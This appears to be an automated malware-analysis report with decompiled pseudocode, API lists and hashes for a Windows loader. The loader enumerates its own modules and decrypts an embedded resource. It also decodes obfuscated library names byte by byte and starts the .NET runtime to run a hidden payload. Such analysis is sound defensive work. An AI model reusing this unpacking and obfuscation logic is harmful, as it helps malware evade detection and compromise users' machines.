                                                                                                              						_v1056 = 0;
                                                                                                              						_v1112 = 0;
                                                                                                              						_v1116 = 0;
                                                                                                              						_v1125 = 0;
                                                                                                              						_v820 =  &_v816;
                                                                                                              						_t370 = E004018D0( &_v816,  &_v820,  &_v1164, _t546, 3);
                                                                                                              						_push( &_v1064);
                                                                                                              						_push(0x41b230);
                                                                                                              						_push(0x41b220);
                                                                                                              						_push(0);
                                                                                                              						_push(L"wks");
                                                                                                              						_push(L"v2.0.50727"); // executed
                                                                                                              						L0040AD3E(); // executed
                                                                                                              						__eflags = _t370;
                                                                                                              						if(_t370 < 0) {
                                                                                                              							_t542 = 0;
                                                                                                              							__eflags = 0;
                                                                                                              							goto L58;
                                                                                                              						} else {
                                                                                                              							_t419 = _v1080;
                                                                                                              							_t421 =  *((intOrPtr*)( *((intOrPtr*)( *_t419 + 0x28))))(_t419); // executed
                                                                                                              							__eflags = _t421;
                                                                                                              							if(_t421 < 0) {
                                                                                                              								L58:
                                                                                                              								_v1149 = 1;
                                                                                                              							} else {
                                                                                                              								_t422 = _v1140;
                                                                                                              								__eflags = _t422;
                                                                                                              								if(_t422 != 0) {
                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_t422 + 8))))(_t422);
                                                                                                              								}
                                                                                                              								_t423 = _v1084;
                                                                                                              								_v1140 = _t542;
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t423 + 0x34))))(_t423,  &_v1140); // executed
                                                                                                              								_t546 = _v1148;
                                                                                                              								__eflags = _t546 - _t542;
                                                                                                              								if(_t546 == _t542) {
                                                                                                              									E0040AD50(0x80004003);
                                                                                                              								}
                                                                                                              								_t426 = _v1152;
                                                                                                              								__eflags = _t426 - _t542;
                                                                                                              								if(_t426 != _t542) {
                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_t426 + 8))))(_t426);
                                                                                                              								}
                                                                                                              								_v1152 = _t542;
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t546))))(_t546, 0x41b270,  &_v1152);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t371 = _v844;
                                                                                                              						__eflags = _t371 -  &_v840;
                                                                                                              						if(__eflags != 0) {
                                                                                                              							_push(_t371);
                                                                                                              							E0040B675(_t453, _t542, _t546, __eflags);
                                                                                                              							_t566 = _t566 + 4;
                                                                                                              						}
                                                                                                              						__eflags = _v1149;
                                                                                                              						if(_v1149 == 0) {
                                                                                                              							_v1148 = _t542;
                                                                                                              							E00401870( &_v1132, _t553, "_._");
                                                                                                              							_t547 = __imp__#8;
                                                                                                              							_v1148 = _t542;
                                                                                                              							 *_t547( &_v1072);
                                                                                                              							E00401870( &_v1084, _t553, "___");
                                                                                                              							_t380 =  *_t547( &_v1064);
                                                                                                              							_t454 = _t453 + 0xfffffff2;
                                                                                                              							_v1140 = _t453 + 0xfffffff2;
                                                                                                              							_v1136 = _t542;
                                                                                                              							__imp__#15(0x11, 1,  &_v1140); // executed
                                                                                                              							_t548 = _t380;
                                                                                                              							_v1156 = _t542;
                                                                                                              							__imp__#23(_t548,  &_v1156);
                                                                                                              							E0040B310(_t453 + 0xfffffff2, _t542, _t548, _v1164, _t553, _t454);
                                                                                                              							_t567 = _t566 + 0xc;
                                                                                                              							__imp__#24(_t548);
                                                                                                              							_t383 = _v1180;
                                                                                                              							__eflags = _t383 - _t542;
                                                                                                              							if(_t383 == _t542) {
                                                                                                              								_t383 = E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t455 = _t383;
                                                                                                              							_t384 = _v1180;
                                                                                                              							__eflags = _t384 - _t542;
                                                                                                              							if(_t384 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t384 + 8))))(_t384);
                                                                                                              							}
                                                                                                              							_v1180 = _t542;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t455 + 0xb4))))(_t455, _t548,  &_v1180); // executed
                                                                                                              							__eflags = _t548 - _t542;
                                                                                                              							if(_t548 != _t542) {
                                                                                                              								__imp__#16(_t548);
                                                                                                              							}
                                                                                                              							_t549 = _v1192;
                                                                                                              							__eflags = _t549 - _t542;
                                                                                                              							if(_t549 == _t542) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t387 = _v1188;
                                                                                                              							__eflags = _t387 - _t542;
                                                                                                              							if(_t387 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t387 + 8))))(_t387);
                                                                                                              							}
                                                                                                              							_t388 = _v1176;
                                                                                                              							_v1188 = _t542;
                                                                                                              							__eflags = _t388 - _t542;
                                                                                                              							if(_t388 == _t542) {
                                                                                                              								_t389 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t389 =  *_t388;
                                                                                                              							}
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t549 + 0x44))))(_t549, _t389,  &_v1188); // executed
                                                                                                              							__imp__#411(0xc, _t542, _t542);
                                                                                                              							_t476 = _v1212;
                                                                                                              							__eflags = _t476 - _t542;
                                                                                                              							if(_t476 == _t542) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t550 = _v1144;
                                                                                                              							__eflags = _t550 - _t542;
                                                                                                              							if(_t550 == _t542) {
                                                                                                              								_t517 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t517 =  *_t550;
                                                                                                              							}
                                                                                                              							_t568 = _t567 - 0x10;
                                                                                                              							_t393 = _t568;
                                                                                                              							 *_t393 = _v1136;
                                                                                                              							 *((intOrPtr*)(_t393 + 4)) = _v1132;
                                                                                                              							 *((intOrPtr*)(_t393 + 8)) = _v1128;
                                                                                                              							 *(_t393 + 0xc) = _v1124;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 0xe4))))(_t476, _t517, 0x118, _t542, _t542,  &_v1120);
                                                                                                              							_t457 = __imp__#9; // 0x76e3cf00
                                                                                                              							 *_t457( &_v1160);
                                                                                                              							__eflags = _t550 - _t542;
                                                                                                              							if(_t550 != _t542) {
                                                                                                              								_t409 = InterlockedDecrement(_t550 + 8);
                                                                                                              								__eflags = _t409;
                                                                                                              								if(_t409 == 0) {
                                                                                                              									_t410 =  *_t550;
                                                                                                              									__eflags = _t410 - _t542;
                                                                                                              									if(_t410 != _t542) {
                                                                                                              										__imp__#6(_t410);
                                                                                                              									}
                                                                                                              									_t411 =  *((intOrPtr*)(_t550 + 4));
                                                                                                              									__eflags = _t411 - _t542;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t411);
                                                                                                              										E0040AF8B(_t457, _t542, _t550, __eflags);
                                                                                                              										_t568 = _t568 + 4;
                                                                                                              									}
                                                                                                              									E0040AE80(_t457, _t542, _t550, __eflags, _t550);
                                                                                                              									_t568 = _t568 + 4;
                                                                                                              								}
                                                                                                              							}
                                                                                                              							 *_t457( &_v1180);
                                                                                                              							_t397 = _v1260;
                                                                                                              							__eflags = _t397 - _t542;
                                                                                                              							if(_t397 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 8))))(_t397);
                                                                                                              							}
                                                                                                              							_t551 = _v1248;
                                                                                                              							__eflags = _t551 - _t542;
                                                                                                              							if(_t551 != _t542) {
                                                                                                              								_t401 = InterlockedDecrement(_t551 + 8);
                                                                                                              								__eflags = _t401;
                                                                                                              								if(_t401 == 0) {
                                                                                                              									_t402 =  *_t551;
                                                                                                              									__eflags = _t402 - _t542;
                                                                                                              									if(_t402 != _t542) {
                                                                                                              										__imp__#6(_t402);
                                                                                                              									}
                                                                                                              									_t403 =  *((intOrPtr*)(_t551 + 4));
                                                                                                              									__eflags = _t403 - _t542;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t403);
                                                                                                              										E0040AF8B(_t457, _t542, _t551, __eflags);
                                                                                                              										_t568 = _t568 + 4;
                                                                                                              									}
                                                                                                              									E0040AE80(_t457, _t542, _t551, __eflags, _t551);
                                                                                                              								}
                                                                                                              							}
                                                                                                              							_t398 = _v1264;
                                                                                                              							__eflags = _t398 - _t542;
                                                                                                              							if(_t398 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t398 + 8))))(_t398);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t372 = _v1140;
                                                                                                              						__eflags = _t372 - _t542;
                                                                                                              						if(_t372 != _t542) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t372 + 8))))(_t372);
                                                                                                              						}
                                                                                                              						_t373 = _v1136;
                                                                                                              						__eflags = _t373 - _t542;
                                                                                                              						if(_t373 != _t542) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t373 + 8))))(_t373);
                                                                                                              						}
                                                                                                              						goto L102;
                                                                                                              					} else {
                                                                                                              						_t440 = E00401650( &_v1092,  &_v980);
                                                                                                              						_t570 = _t560 + 8;
                                                                                                              						_t528 =  &_v528;
                                                                                                              						while(1) {
                                                                                                              							_t496 =  *_t528;
                                                                                                              							if(_t496 !=  *_t440) {
                                                                                                              								break;
                                                                                                              							}
                                                                                                              							if(_t496 == 0) {
                                                                                                              								L7:
                                                                                                              								_t440 = 0;
                                                                                                              							} else {
                                                                                                              								_t502 =  *((intOrPtr*)(_t528 + 1));
                                                                                                              								if(_t502 !=  *((intOrPtr*)(_t440 + 1))) {
                                                                                                              									break;
                                                                                                              								} else {
                                                                                                              									_t528 = _t528 + 2;
                                                                                                              									_t440 = _t440 + 2;
                                                                                                              									if(_t502 != 0) {
                                                                                                              										continue;
                                                                                                              									} else {
                                                                                                              										goto L7;
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              							L9:
                                                                                                              							if(_t440 != 0) {
                                                                                                              								_t442 = E00401650( &_v1164,  &_v1012);
                                                                                                              								_t560 = _t570 + 8;
                                                                                                              								_t497 =  &_v528;
                                                                                                              								while(1) {
                                                                                                              									_t530 =  *_t497;
                                                                                                              									__eflags = _t530 -  *_t442;
                                                                                                              									if(_t530 !=  *_t442) {
                                                                                                              										break;
                                                                                                              									}
                                                                                                              									__eflags = _t530;
                                                                                                              									if(_t530 == 0) {
                                                                                                              										L16:
                                                                                                              										_t442 = 0;
                                                                                                              									} else {
                                                                                                              										_t537 =  *((intOrPtr*)(_t497 + 1));
                                                                                                              										__eflags = _t537 -  *((intOrPtr*)(_t442 + 1));
                                                                                                              										if(_t537 !=  *((intOrPtr*)(_t442 + 1))) {
                                                                                                              											break;
                                                                                                              										} else {
                                                                                                              											_t497 = _t497 + 2;
                                                                                                              											_t442 = _t442 + 2;
                                                                                                              											__eflags = _t537;
                                                                                                              											if(_t537 != 0) {
                                                                                                              												continue;
                                                                                                              											} else {
                                                                                                              												goto L16;
                                                                                                              											}
                                                                                                              										}
                                                                                                              									}
                                                                                                              									L18:
                                                                                                              									__eflags = _t442;
                                                                                                              									if(_t442 == 0) {
                                                                                                              										goto L10;
                                                                                                              									} else {
                                                                                                              										_t445 = Module32Next(_t544,  &_v560);
                                                                                                              										__eflags = _t445;
                                                                                                              										if(_t445 != 0) {
                                                                                                              											do {
                                                                                                              												_t447 = E00401650( &_v1096,  &_v984);
                                                                                                              												_t571 = _t560 + 8;
                                                                                                              												_t499 =  &_v532;
                                                                                                              												while(1) {
                                                                                                              													_t532 =  *_t499;
                                                                                                              													__eflags = _t532 -  *_t447;
                                                                                                              													if(_t532 !=  *_t447) {
                                                                                                              														break;
                                                                                                              													}
                                                                                                              													__eflags = _t532;
                                                                                                              													if(_t532 == 0) {
                                                                                                              														L26:
                                                                                                              														_t447 = 0;
                                                                                                              													} else {
                                                                                                              														_t536 =  *((intOrPtr*)(_t499 + 1));
                                                                                                              														__eflags = _t536 -  *((intOrPtr*)(_t447 + 1));
                                                                                                              														if(_t536 !=  *((intOrPtr*)(_t447 + 1))) {
                                                                                                              															break;
                                                                                                              														} else {
                                                                                                              															_t499 = _t499 + 2;
                                                                                                              															_t447 = _t447 + 2;
                                                                                                              															__eflags = _t536;
                                                                                                              															if(_t536 != 0) {
                                                                                                              																continue;
                                                                                                              															} else {
                                                                                                              																goto L26;
                                                                                                              															}
                                                                                                              														}
                                                                                                              													}
                                                                                                              													L28:
                                                                                                              													__eflags = _t447;
                                                                                                              													if(_t447 == 0) {
                                                                                                              														goto L10;
                                                                                                              													} else {
                                                                                                              														_t448 = E00401650( &_v1168,  &_v1016);
                                                                                                              														_t560 = _t571 + 8;
                                                                                                              														_t501 =  &_v532;
                                                                                                              														while(1) {
                                                                                                              															_t534 =  *_t501;
                                                                                                              															__eflags = _t534 -  *_t448;
                                                                                                              															if(_t534 !=  *_t448) {
                                                                                                              																break;
                                                                                                              															}
                                                                                                              															__eflags = _t534;
                                                                                                              															if(_t534 == 0) {
                                                                                                              																L34:
                                                                                                              																_t448 = 0;
                                                                                                              															} else {
                                                                                                              																_t535 =  *((intOrPtr*)(_t501 + 1));
                                                                                                              																__eflags = _t535 -  *((intOrPtr*)(_t448 + 1));
                                                                                                              																if(_t535 !=  *((intOrPtr*)(_t448 + 1))) {
                                                                                                              																	break;
                                                                                                              																} else {
                                                                                                              																	_t501 = _t501 + 2;
                                                                                                              																	_t448 = _t448 + 2;
                                                                                                              																	__eflags = _t535;
                                                                                                              																	if(_t535 != 0) {
                                                                                                              																		continue;
                                                                                                              																	} else {
                                                                                                              																		goto L34;
                                                                                                              																	}
                                                                                                              																}
                                                                                                              															}
                                                                                                              															L36:
                                                                                                              															__eflags = _t448;
                                                                                                              															if(_t448 == 0) {
                                                                                                              																goto L10;
                                                                                                              															} else {
                                                                                                              																goto L37;
                                                                                                              															}
                                                                                                              															goto L103;
                                                                                                              														}
                                                                                                              														asm("sbb eax, eax");
                                                                                                              														asm("sbb eax, 0xffffffff");
                                                                                                              														goto L36;
                                                                                                              													}
                                                                                                              													goto L103;
                                                                                                              												}
                                                                                                              												asm("sbb eax, eax");
                                                                                                              												asm("sbb eax, 0xffffffff");
                                                                                                              												goto L28;
                                                                                                              												L37:
                                                                                                              												_t450 = Module32Next(_t544,  &_v564);
                                                                                                              												__eflags = _t450;
                                                                                                              											} while (_t450 != 0);
                                                                                                              										}
                                                                                                              										goto L38;
                                                                                                              									}
                                                                                                              									goto L103;
                                                                                                              								}
                                                                                                              								asm("sbb eax, eax");
                                                                                                              								asm("sbb eax, 0xffffffff");
                                                                                                              								goto L18;
                                                                                                              							} else {
                                                                                                              								L10:
                                                                                                              								CloseHandle(_t544);
                                                                                                              								return 0;
                                                                                                              							}
                                                                                                              							goto L103;
                                                                                                              						}
                                                                                                              						asm("sbb eax, eax");
                                                                                                              						asm("sbb eax, 0xffffffff");
                                                                                                              						goto L9;
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L103:
                                                                                                              			}

                                                                                                              0x00401f02
                                                                                                              0x00401f08
                                                                                                              0x00401f0a
                                                                                                              0x00401f0d
                                                                                                              0x00401f0e
                                                                                                              0x00401f13
                                                                                                              0x00401f13
                                                                                                              0x00401f15
                                                                                                              0x00401f16
                                                                                                              0x00401f16
                                                                                                              0x00401f23
                                                                                                              0x00401f2c
                                                                                                              0x00401f32
                                                                                                              0x00401f35
                                                                                                              0x00401f3c
                                                                                                              0x00401f4a
                                                                                                              0x00401f4c
                                                                                                              0x00401f53
                                                                                                              0x00401f60
                                                                                                              0x00401f6d
                                                                                                              0x00401f7f
                                                                                                              0x00401f7f
                                                                                                              0x00401f82
                                                                                                              0x00401f87
                                                                                                              0x00401f8c
                                                                                                              0x00401f91
                                                                                                              0x00401f96
                                                                                                              0x00401f9b
                                                                                                              0x00401fa0
                                                                                                              0x00401fa5
                                                                                                              0x00401faa
                                                                                                              0x00401faf
                                                                                                              0x00401fb4
                                                                                                              0x00401fb9
                                                                                                              0x00401fbe
                                                                                                              0x00401fc3
                                                                                                              0x00401fc8
                                                                                                              0x00401fcd
                                                                                                              0x00401fd2
                                                                                                              0x00401fd7
                                                                                                              0x00401fdc
                                                                                                              0x00401fe1
                                                                                                              0x00401fe6
                                                                                                              0x00401feb
                                                                                                              0x00401ff0
                                                                                                              0x00401ff5
                                                                                                              0x00401ffa
                                                                                                              0x00401fff
                                                                                                              0x00402004
                                                                                                              0x00402009
                                                                                                              0x0040200e
                                                                                                              0x00402013
                                                                                                              0x00402018
                                                                                                              0x0040201d
                                                                                                              0x00402022
                                                                                                              0x00402030
                                                                                                              0x00402038
                                                                                                              0x0040203d
                                                                                                              0x00402042
                                                                                                              0x00402047
                                                                                                              0x0040204c
                                                                                                              0x00402051
                                                                                                              0x00402056
                                                                                                              0x0040205b
                                                                                                              0x0040206d
                                                                                                              0x00402072
                                                                                                              0x00402077
                                                                                                              0x0040207c
                                                                                                              0x00402081
                                                                                                              0x00402086
                                                                                                              0x0040208b
                                                                                                              0x00402090
                                                                                                              0x00402095
                                                                                                              0x0040209a
                                                                                                              0x0040209f
                                                                                                              0x004020a4
                                                                                                              0x004020a9
                                                                                                              0x004020ae
                                                                                                              0x004020b3
                                                                                                              0x004020b8
                                                                                                              0x004020bd
                                                                                                              0x004020c2
                                                                                                              0x004020c7
                                                                                                              0x004020cc
                                                                                                              0x004020d1
                                                                                                              0x004020d6
                                                                                                              0x004020db
                                                                                                              0x004020e0
                                                                                                              0x004020e5
                                                                                                              0x004020ea
                                                                                                              0x004020ef
                                                                                                              0x004020fa
                                                                                                              0x004020ff
                                                                                                              0x00402112
                                                                                                              0x00402119
                                                                                                              0x0040211d
                                                                                                              0x00402121
                                                                                                              0x00402126
                                                                                                              0x0040212d
                                                                                                              0x00402136
                                                                                                              0x00402137
                                                                                                              0x0040213c
                                                                                                              0x00402141
                                                                                                              0x00402142
                                                                                                              0x00402147
                                                                                                              0x0040214c
                                                                                                              0x00402151
                                                                                                              0x00402153
                                                                                                              0x004021c3
                                                                                                              0x004021c3
                                                                                                              0x00000000
                                                                                                              0x00402155
                                                                                                              0x00402155
                                                                                                              0x0040215f
                                                                                                              0x00402161
                                                                                                              0x00402163
                                                                                                              0x004021c5
                                                                                                              0x004021c5
                                                                                                              0x00402165
                                                                                                              0x00402165
                                                                                                              0x00402169
                                                                                                              0x0040216b
                                                                                                              0x00402173
                                                                                                              0x00402173
                                                                                                              0x00402175
                                                                                                              0x0040217d
                                                                                                              0x00402188
                                                                                                              0x0040218a
                                                                                                              0x0040218e
                                                                                                              0x00402190
                                                                                                              0x00402197
                                                                                                              0x00402197
                                                                                                              0x0040219c
                                                                                                              0x004021a0
                                                                                                              0x004021a2
                                                                                                              0x004021aa
                                                                                                              0x004021aa
                                                                                                              0x004021b1
                                                                                                              0x004021bf
                                                                                                              0x004021bf
                                                                                                              0x00402163
                                                                                                              0x004021ca
                                                                                                              0x004021d8
                                                                                                              0x004021da
                                                                                                              0x004021dc
                                                                                                              0x004021dd
                                                                                                              0x004021e2
                                                                                                              0x004021e2
                                                                                                              0x004021e5
                                                                                                              0x004021ea
                                                                                                              0x004021f9
                                                                                                              0x004021fd
                                                                                                              0x00402202
                                                                                                              0x00402210
                                                                                                              0x00402214
                                                                                                              0x00402222
                                                                                                              0x0040222f
                                                                                                              0x00402238
                                                                                                              0x0040223d
                                                                                                              0x00402241
                                                                                                              0x00402245
                                                                                                              0x0040224f
                                                                                                              0x00402253
                                                                                                              0x00402257
                                                                                                              0x00402264
                                                                                                              0x00402269
                                                                                                              0x0040226d
                                                                                                              0x00402273
                                                                                                              0x00402277
                                                                                                              0x00402279
                                                                                                              0x00402280
                                                                                                              0x00402280
                                                                                                              0x00402285
                                                                                                              0x00402287
                                                                                                              0x0040228b
                                                                                                              0x0040228d
                                                                                                              0x00402295
                                                                                                              0x00402295
                                                                                                              0x0040229c
                                                                                                              0x004022aa
                                                                                                              0x004022ac
                                                                                                              0x004022ae
                                                                                                              0x004022b1
                                                                                                              0x004022b1
                                                                                                              0x004022b7
                                                                                                              0x004022bb
                                                                                                              0x004022bd
                                                                                                              0x004022c4
                                                                                                              0x004022c4
                                                                                                              0x004022c9
                                                                                                              0x004022cd
                                                                                                              0x004022cf
                                                                                                              0x004022d7
                                                                                                              0x004022d7
                                                                                                              0x004022d9
                                                                                                              0x004022dd
                                                                                                              0x004022e1
                                                                                                              0x004022e3
                                                                                                              0x004022e9
                                                                                                              0x004022e9
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022f7
                                                                                                              0x004022fd
                                                                                                              0x00402303
                                                                                                              0x00402307
                                                                                                              0x00402309
                                                                                                              0x00402310
                                                                                                              0x00402310
                                                                                                              0x00402315
                                                                                                              0x0040231c
                                                                                                              0x0040231e
                                                                                                              0x00402324
                                                                                                              0x00402324
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402338
                                                                                                              0x0040233b
                                                                                                              0x0040233d
                                                                                                              0x00402347
                                                                                                              0x00402356
                                                                                                              0x00402368
                                                                                                              0x0040236b
                                                                                                              0x0040236d
                                                                                                              0x0040237b
                                                                                                              0x00402383
                                                                                                              0x00402385
                                                                                                              0x0040238b
                                                                                                              0x0040238d

                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040198C
                                                                                                              • _getenv.LIBCMT ref: 00401A4B
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401A5E
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00401A67
                                                                                                              • Module32First.KERNEL32 ref: 00401BCE
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C21
                                                                                                              • Module32Next.KERNEL32 ref: 00401C82
                                                                                                              • Module32Next.KERNEL32 ref: 00401D36
                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D44
                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401D4C
                                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E12
                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                                                              • LockResource.KERNEL32(00000000), ref: 00401E29
                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E33
                                                                                                              • _malloc.LIBCMT ref: 00401E3A
                                                                                                              • _memset.LIBCMT ref: 00401E5E
                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$0x1$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$e$h$o$o$o$u$v$v$v$v$v2.0.50727$wks$x$x$x$x${${${${
                                                                                                              • API String ID: 2366190142-2844197788
                                                                                                              • Opcode ID: 7bbc1a5f4410980cb47b7bc0ec272e837d734d4926012e53b07bbd4fb7262dc7
                                                                                                              • Instruction ID: 06cd9fd9dd9691a4cef85659ff1c2b68883106d479d5a1e127a1e26792eb73f0
                                                                                                              • Opcode Fuzzy Hash: 7bbc1a5f4410980cb47b7bc0ec272e837d734d4926012e53b07bbd4fb7262dc7
                                                                                                              • Instruction Fuzzy Hash: 4E728B3000C7C19AD321DB388888A5BBFD59FA6318F484A5DF1E49B2E2D779D509C76B
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 64%
                                                                                                              			E00401EB6(void* __ebx, intOrPtr* __edi, void* __eflags, char _a4, char _a5, char _a6, char _a7, char _a8, char _a9, char _a10, char _a11, char _a12, char _a13, char _a14, char _a15, char _a16, char _a17, char _a18, char _a19, void* _a20, char _a21, char _a22, char _a23, void* _a24, char _a25, char _a26, char _a27, char _a28, char _a29, char _a30, char _a31, void* _a32, char _a33, char _a34, char _a35, char _a36, intOrPtr _a40, char _a43, intOrPtr _a44, signed int _a48, char _a52, char _a56, char _a60, struct HRSRC__* _a64, intOrPtr _a68, intOrPtr _a80, void* _a84, intOrPtr* _a88, char _a96, char _a104, char _a112, char _a120, intOrPtr _a128, char _a220, char _a252, intOrPtr _a324, char _a328, char _a348, char _a352) {
                                                                                                              				intOrPtr* _v8;
                                                                                                              				char _v12;
                                                                                                              				char _v20;
                                                                                                              				intOrPtr* _v24;
                                                                                                              				intOrPtr* _v44;
                                                                                                              				intOrPtr* _v80;
                                                                                                              				intOrPtr* _v92;
                                                                                                              				intOrPtr* _v96;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				intOrPtr _t165;
                                                                                                              				intOrPtr* _t170;
                                                                                                              				long _t171;
                                                                                                              				struct HINSTANCE__* _t177;
                                                                                                              				CHAR* _t178;
                                                                                                              				void* _t181;
                                                                                                              				intOrPtr _t182;
                                                                                                              				intOrPtr* _t183;
                                                                                                              				intOrPtr* _t184;
                                                                                                              				void* _t192;
                                                                                                              				intOrPtr* _t195;
                                                                                                              				intOrPtr* _t196;
                                                                                                              				intOrPtr* _t199;
                                                                                                              				intOrPtr* _t200;
                                                                                                              				intOrPtr _t201;
                                                                                                              				intOrPtr* _t205;
                                                                                                              				intOrPtr* _t209;
                                                                                                              				intOrPtr* _t210;
                                                                                                              				intOrPtr _t214;
                                                                                                              				intOrPtr _t215;
                                                                                                              				intOrPtr _t222;
                                                                                                              				intOrPtr _t223;
                                                                                                              				intOrPtr* _t231;
                                                                                                              				void* _t233;
                                                                                                              				intOrPtr* _t234;
                                                                                                              				intOrPtr* _t235;
                                                                                                              				intOrPtr* _t238;
                                                                                                              				void* _t245;
                                                                                                              				void* _t248;
                                                                                                              				char _t249;
                                                                                                              				intOrPtr* _t252;
                                                                                                              				intOrPtr* _t254;
                                                                                                              				signed int _t259;
                                                                                                              				intOrPtr* _t273;
                                                                                                              				intOrPtr _t296;
                                                                                                              				intOrPtr* _t307;
                                                                                                              				char _t309;
                                                                                                              				void* _t311;
                                                                                                              				intOrPtr* _t312;
                                                                                                              				intOrPtr* _t314;
                                                                                                              				void* _t315;
                                                                                                              				intOrPtr* _t316;
                                                                                                              				intOrPtr* _t317;
                                                                                                              				intOrPtr* _t318;
                                                                                                              				struct HINSTANCE__* _t319;
                                                                                                              				void* _t320;
                                                                                                              				void* _t327;
                                                                                                              				intOrPtr* _t331;
                                                                                                              				void* _t333;
                                                                                                              
                                                                                                              				_t307 = __edi;
                                                                                                              				_t248 = __ebx;
                                                                                                              				do {
                                                                                                              					_t165 = _a80;
                                                                                                              					_push(_a128 + _t165);
                                                                                                              					_push(0x400);
                                                                                                              					_push(_t165);
                                                                                                              					E00401560(__ebx, _a56);
                                                                                                              					_a68 = _a68 + 0x400;
                                                                                                              					_t6 =  &_a60;
                                                                                                              					 *_t6 = _a60 - 1;
                                                                                                              				} while ( *_t6 != 0);
                                                                                                              				_t259 = _a48 & 0x800003ff;
                                                                                                              				if(_t259 < 0) {
                                                                                                              					_t259 = (_t259 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                              				}
                                                                                                              				if(_t259 > 0) {
                                                                                                              					_t245 = _a48 - _t259;
                                                                                                              					_t286 = _t245 + _t307;
                                                                                                              					_push(_t245 + _t307);
                                                                                                              					_push(_t259);
                                                                                                              					_push(_t245 + _t248);
                                                                                                              					E00401560(_t248, _a44);
                                                                                                              				}
                                                                                                              				E0040B9F0(_t307, _t248, 0, _a48);
                                                                                                              				FreeResource(_t311);
                                                                                                              				_t249 =  *_t307;
                                                                                                              				_a120 = _t249;
                                                                                                              				_t170 = E0040B80D(_t249, _t286, _t307, _t249); // executed
                                                                                                              				_t312 = _t170;
                                                                                                              				_t171 = SizeofResource(_t319, _a64);
                                                                                                              				_t15 = _t307 + 4; // 0x4
                                                                                                              				E0040AC10(_t312,  &_a120, _t15, _t171);
                                                                                                              				E0040B9F0(_t307, _t307, 0, _a48);
                                                                                                              				_t20 = _t312 + 0xe; // 0xe
                                                                                                              				_t320 = _t20;
                                                                                                              				_a4 = 0xce;
                                                                                                              				_a5 = 0x27;
                                                                                                              				_a6 = 0x9c;
                                                                                                              				_a7 = 0x1a;
                                                                                                              				_a8 = 0x95;
                                                                                                              				_a9 = 0x21;
                                                                                                              				_a10 = 0x2e;
                                                                                                              				_a11 = 0xd;
                                                                                                              				_a12 = 0xdb;
                                                                                                              				_a13 = 0x29;
                                                                                                              				_a14 = 0x57;
                                                                                                              				_a15 = 0x56;
                                                                                                              				_a16 = 0xf8;
                                                                                                              				_a17 = 0x98;
                                                                                                              				_a18 = 0x5b;
                                                                                                              				_a19 = 0xf4;
                                                                                                              				_a20 = 0xb5;
                                                                                                              				_a21 = 0x87;
                                                                                                              				_a22 = 0x7b;
                                                                                                              				_a23 = 0xf;
                                                                                                              				_a24 = 0xf4;
                                                                                                              				_a25 = 0x76;
                                                                                                              				_a26 = 0xb9;
                                                                                                              				_a27 = 0x34;
                                                                                                              				_a28 = 0xbf;
                                                                                                              				_a29 = 0x1e;
                                                                                                              				_a30 = 0xe7;
                                                                                                              				_a31 = 0x78;
                                                                                                              				_a32 = 0x98;
                                                                                                              				_a33 = 0xe9;
                                                                                                              				_a34 = 0x6f;
                                                                                                              				_a35 = 0xb4;
                                                                                                              				_a36 = 0;
                                                                                                              				_t177 = LoadLibraryA(E00401650( &_a4,  &_a252));
                                                                                                              				_a4 = 0xe0;
                                                                                                              				_a5 = 0x18;
                                                                                                              				_a6 = 0xad;
                                                                                                              				_a7 = 0x36;
